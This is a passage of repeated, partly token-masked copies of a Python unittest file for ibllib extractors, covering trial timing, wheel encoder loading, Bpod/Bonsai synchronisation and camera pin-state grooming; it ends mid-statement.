camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = 